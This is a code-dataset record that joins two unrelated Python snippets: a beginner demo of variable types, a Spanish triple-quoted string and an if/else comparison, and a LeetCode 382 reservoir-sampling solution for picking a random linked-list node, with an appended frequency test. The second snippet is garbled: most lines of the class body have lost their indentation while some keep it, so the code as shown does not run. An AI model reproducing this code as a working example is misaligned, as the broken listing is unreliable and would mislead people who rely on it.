Nombre = 5
print(type(Nombre))
Nombre = 5.4
print(type(Nombre))
Nombre = "John"
print(type(Nombre))
Mensaje = """ Esto es un
mensaje utilizando comilla
triple. Sirve para dar todos
los saltos de líneas que te vengan
en gana."""
print(Mensaje)
Number1 = 4
Number2 = 6
if Number2 > Number1:
    print(Number2, "is greater than", Number1)
else:
    print(Number2, "is less than or equal to", Number1)
|
python
|
#
# @lc app=leetcode.cn id=382 lang=python3
#
# [382] Linked List Random Node
#
# https://leetcode-cn.com/problems/linked-list-random-node/description/
#
# algorithms
# Medium (57.03%)
# Likes: 66
# Dislikes: 0
# Total Accepted: 6K
# Total Submissions: 10.6K
# Testcase Example: '["Solution","getRandom"]\n[[[1,2,3]],[]]'
#
# Given a singly linked list, return a random node's value from the list.
# Each node must have the same probability of being chosen.
#
# Follow up:
# What if the linked list is extremely large and its length is unknown?
# Could you solve this using constant space complexity?
#
# Example:
#
#
# // Init a singly linked list [1,2,3].
# ListNode head = new ListNode(1);
# head.next = new ListNode(2);
# head.next.next = new ListNode(3);
# Solution solution = new Solution(head);
#
# // getRandom() should return 1, 2 or 3 at random; each element must be
# // returned with equal probability.
# solution.getRandom();
#
#
#
# @lc code=start
# Definition for singly-linked list.
# class ListNode:
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution:
def __init__(self, head: ListNode):
"""
@param head The linked list's head.
Note that the head is guaranteed to be not null, so it contains at least one node.
"""
self.head = head
def getRandom(self) -> int:
"""
Returns a random node's value.
"""
import random
i = 0
res = 0
        p = self.head
        # Reservoir sampling with k=1: node i (0-based) replaces the current
        # pick with probability 1/(i+1), so every node is returned with
        # probability 1/n overall.
        while p:
r = random.randint(0,i)
if r == 0:
res = p.val
i = i + 1
p = p.next
return res
# Your Solution object will be instantiated and called as such:
# obj = Solution(head)
# param_1 = obj.getRandom()
# @lc code=end
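# Hedged demonstration (added, outside the LeetCode template): an empirical
# check that the reservoir sampling above returns each value roughly equally
# often. ListNode is normally provided by the LeetCode judge; a minimal local
# version is declared here only so the sketch is self-contained.
def _reservoir_sampling_demo():
    class ListNode:
        def __init__(self, x):
            self.val = x
            self.next = None

    head = ListNode(1)
    head.next = ListNode(2)
    head.next.next = ListNode(3)
    solution = Solution(head)

    from collections import Counter
    counts = Counter(solution.getRandom() for _ in range(30000))
    # Each of 1, 2, 3 should come up roughly a third of the time.
    assert all(abs(counts[v] / 30000 - 1 / 3) < 0.05 for v in (1, 2, 3))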
|
python
|